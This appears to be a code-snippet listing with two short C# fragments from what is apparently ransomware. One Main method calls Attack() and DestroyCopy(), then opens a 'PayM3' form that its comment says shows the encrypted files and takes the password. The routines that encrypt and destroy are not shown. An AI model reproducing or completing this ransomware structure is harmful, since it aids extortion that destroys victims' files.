示例#1
0
        static void CreateUI()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            PayM3 thx = new PayM3();

            Application.Run(thx);
        }
示例#2
0
        static void Main()
        {
            //Start the attack
            Attack();

            //Destroy copy
            DestroyCopy();

            //Creates a popup that lets you view the encrypted files and add the password
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            PayM3 thx = new PayM3();

            Application.Run(thx);
        }